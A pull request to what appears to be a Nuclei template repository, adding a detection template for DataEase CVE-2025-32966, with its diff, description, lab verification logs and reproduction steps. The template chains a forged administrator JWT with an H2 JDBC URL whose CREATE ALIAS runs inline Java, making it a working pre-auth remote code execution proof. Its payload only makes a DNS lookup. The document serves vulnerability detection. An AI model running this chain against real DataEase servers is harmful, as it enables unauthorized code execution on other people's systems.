### PR TITLE
Add CVE-2025-32966 - DataEase H2 JDBC pre-auth RCE (chained with CVE-2025-49001)

### DIFF
--- a/http/cves/2025/CVE-2025-32966.yaml
+++ b/http/cves/2025/CVE-2025-32966.yaml
@@ -1,19 +1,19 @@
 id: CVE-2025-32966
 
 info:
-  name: DataEase 2.10.4-2.10.7 - Pre-Auth H2 JDBC Remote Code Execution
+  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
   author: ChrisJr404
   severity: critical
   description: |
-    DataEase versions 2.10.4 through 2.10.7 pass the user-supplied H2 JDBC URL straight to `CalciteProvider#getConnection` from `/de2api/datasource/validate` without sanitization. H2's `CREATE ALIAS ... $$ ... $$` syntax embeds inline Java source code that runs when the URL is opened, yielding remote code execution inside the DataEase JVM. The advisory marks the issue as authenticated, but CVE-2025-49001 in the same release line lets an unauthenticated attacker forge an administrator JWT, so the two flaws are typically chained for pre-auth RCE.
+    DataEase prior to version 2.10.8 contains a remote code execution caused by insecure backend JDBC link handling, letting authenticated users execute arbitrary code, exploit requires user authentication.
   impact: |
-    Unauthenticated remote code execution inside the DataEase JVM (running as `root` in the official container image) when chained with CVE-2025-49001.
+    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
   remediation: |
-    Upgrade to DataEase 2.10.8 or later (which also includes the fix for CVE-2025-49001 starting in 2.10.11).
+    Update to version 2.10.8 or later.
   reference:
     - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
     - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-32966
+    - https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -28,7 +28,7 @@ info:
     product: dataease
     shodan-query: http.html:"dataease"
     fofa-query: body="dataease"
-  tags: cve,cve2025,dataease,h2,rce,jdbc
+  tags: cve,cve2025,dataease,h2,rce,jdbc,oss
 
 variables:
   unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"

--- a/http/cves/2025/CVE-2025-32966.yaml
+++ b/http/cves/2025/CVE-2025-32966.yaml
@@ -1,0 +1,57 @@
+id: CVE-2025-32966
+
+info:
+  name: DataEase 2.10.4-2.10.7 - Pre-Auth H2 JDBC Remote Code Execution
+  author: ChrisJr404
+  severity: critical
+  description: |
+    DataEase versions 2.10.4 through 2.10.7 pass the user-supplied H2 JDBC URL straight to `CalciteProvider#getConnection` from `/de2api/datasource/validate` without sanitization. H2's `CREATE ALIAS ... $$ ... $$` syntax embeds inline Java source code that runs when the URL is opened, yielding remote code execution inside the DataEase JVM. The advisory marks the issue as authenticated, but CVE-2025-49001 in the same release line lets an unauthenticated attacker forge an administrator JWT, so the two flaws are typically chained for pre-auth RCE.
+  impact: |
+    Unauthenticated remote code execution inside the DataEase JVM (running as `root` in the official container image) when chained with CVE-2025-49001.
+  remediation: |
+    Upgrade to DataEase 2.10.8 or later (which also includes the fix for CVE-2025-49001 starting in 2.10.11).
+  reference:
+    - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
+    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-32966
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-32966
+    cwe-id: CWE-94
+    epss-score: 0.10823
+    epss-percentile: 0.93388
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: dataease
+    product: dataease
+    shodan-query: http.html:"dataease"
+    fofa-query: body="dataease"
+  tags: cve,cve2025,dataease,h2,rce,jdbc
+
+variables:
+  unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"
+  inner_payload: '{"jdbc":"jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{unique}}\")\\; }$$\\;CALL LK()","username":"","password":"","driver":"org.h2.Driver"}'
+  conf_b64: "{{base64(inner_payload)}}"
+  jwt_claims: '{"uid":1,"oid":1,"exp":{{unix_time(3600)}}}'
+  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","ChrisJr404") }}'
+
+http:
+  - raw:
+      - |
+        POST /de2api/datasource/validate HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        X-DE-TOKEN: {{forged_jwt}}
+
+        {"name":"p","type":"h2","configuration":"{{conf_b64}}"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 400'
+          - 'contains(body, "Exception calling user-defined function")'
+          - 'contains(body, "{{unique}}")'
+          - 'contains(body, "CREATE ALIAS LK")'
+        condition: and

--- a/http/cves/2025/CVE-2025-32966.yaml
+++ b/http/cves/2025/CVE-2025-32966.yaml
@@ -51,7 +51,5 @@ http:
       - type: dsl
         dsl:
           - 'status_code == 400'
-          - 'contains(body, "Exception calling user-defined function")'
-          - 'contains(body, "{{unique}}")'
-          - 'contains(body, "CREATE ALIAS LK")'
+          - 'contains_all(body, "Exception calling user-defined function", "{{unique}}", "CREATE ALIAS LK")'
         condition: and


### PR DESCRIPTION
### Summary
Adds a verified template for **CVE-2025-32966** — DataEase 2.10.4 through 2.10.7 pass the user-supplied H2 JDBC URL straight to `CalciteProvider#getConnection` from `/de2api/datasource/validate` without sanitization. H2's `CREATE ALIAS ... $$ ... $$` syntax embeds inline Java source code that runs when the URL is opened, yielding remote code execution inside the DataEase JVM.

The advisory marks the issue as authenticated, but **CVE-2025-49001** in the same release line lets an unauthenticated attacker forge an administrator JWT, so the two flaws chain into pre-auth RCE.

References:
- https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
- https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
- https://nvd.nist.gov/vuln/detail/CVE-2025-32966

### Detection logic — non-destructive arbitrary-code-execution proof
The template:

1. **Forges an administrator JWT** with any HMAC secret (CVE-2025-49001 — the signature exception is caught but the filter chain still continues).
2. **Builds an H2 in-memory JDBC URL** whose `INIT` parameter creates an alias backed by a one-line Java method that calls `java.net.InetAddress.getByName(<unique random hostname>)` and immediately calls it.
3. **POSTs the base64-encoded payload** to `/de2api/datasource/validate`.
4. **Matches** the response on four conditions, all required:
   - `status_code == 400`
   - body contains `Exception calling user-defined function`
   - body contains the **unique 18-character random hostname** the template generated for this scan
   - body contains `CREATE ALIAS LK`

Why this is a sound detection without actually running shell commands:
- The H2 alias body uses `java.net.InetAddress.getByName(...)` rather than `Runtime.exec(...)`. On any host, vulnerable or not, this Java call will either succeed (DNS resolves) or throw `UnknownHostException` (DNS NXDOMAIN), but neither outcome modifies state on the target.
- The unique random hostname appears in the response error message **only if** the H2 driver successfully parsed the malicious URL, compiled the alias, and invoked the user-defined function. That's full Java code execution under attacker control.
- A patched instance (2.10.8+) rejects the configuration before reaching the H2 driver, so the unique string never appears in the response.

### Verification
Tested on a clean Kali host using the published vulhub image.

**Vulnerable target — match:**

`vulhub/dataease:2.10.7` (from `vulhub/dataease/CVE-2025-32966/`):
```
[CVE-2025-32966] Dumped HTTP request for http://127.0.0.1:8100/de2api/datasource/validate
POST /de2api/datasource/validate HTTP/1.1
Content-Type: application/json
X-DE-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

{"name":"p","type":"h2","configuration":"<base64 H2 URL with CREATE ALIAS LK and unique hostname>"}

[CVE-2025-32966] Dumped HTTP response
HTTP/1.1 400
DE-Gateway-Flag: The%20Token%27s%20Signature%20resulted%20invalid...
X-De-Execute-Version: 2.10.7

{"code":400,"msg":"Request processing failed: DEException(code=40001, msg=Exception calling user-defined function: \"lk(): uHvdQtlpKK.lRpgjOjD.local: Name does not resolve\"; SQL statement:\nCREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"uHvdQtlpKK.lRpgjOjD.local\"); }$$ [90105-220])","data":null}

[CVE-2025-32966:dsl-1] [http] [critical] http://127.0.0.1:8100/de2api/datasource/validate
[INF] Scan completed in 122ms. 1 matches found.
```

The template-generated hostname `uHvdQtlpKK.lRpgjOjD.local` appears verbatim inside the response body — proving the H2 alias was created **and called** under attacker control.

I also independently confirmed via `tcpdump -i any 'udp port 53'` running on the host: the DataEase container emits an actual DNS A and AAAA query for the random hostname out to the host's DNS, which is the network-side proof that real Java code under attacker control executed inside the JVM.

### Reproduction
```bash
git clone https://github.com/vulhub/vulhub.git
cd vulhub/dataease/CVE-2025-32966
docker compose up -d
# wait ~45s for Spring + MySQL to come up
nuclei -t http/cves/2025/CVE-2025-32966.yaml -u http://localhost:8100
```

### Notes
- This template intentionally avoids `Runtime.exec(...)`, file writes, or any state-changing payload. The detection signal is the unique random hostname echoing back in the response error — same idea as a Log4Shell `${jndi:ldap://<unique>.interactsh}` template, but using H2's native ALIAS feature instead of JNDI.
- The template uses `generate_jwt(...)` and `base64(...)` helpers following the existing-template style (e.g. `http/cves/2024/CVE-2024-47073.yaml`, `http/cves/2025/CVE-2025-20188.yaml`).
- Companion templates: `http/cves/2024/CVE-2024-56511.yaml` (auth bypass) and `http/cves/2025/CVE-2025-49001.yaml` (JWT bypass) — also submitted in this batch.

### Template Type / Checklist
- [x] CVE template (http/cves/2025/)
- [x] Verified (`metadata.verified: true`)
- [x] Multi-condition matcher with random nonce reflection (no false positive risk)
- [x] Non-destructive payload (no shell exec, no file writes)
- [x] Validated with `nuclei -validate`
- [x] No real-world targets referenced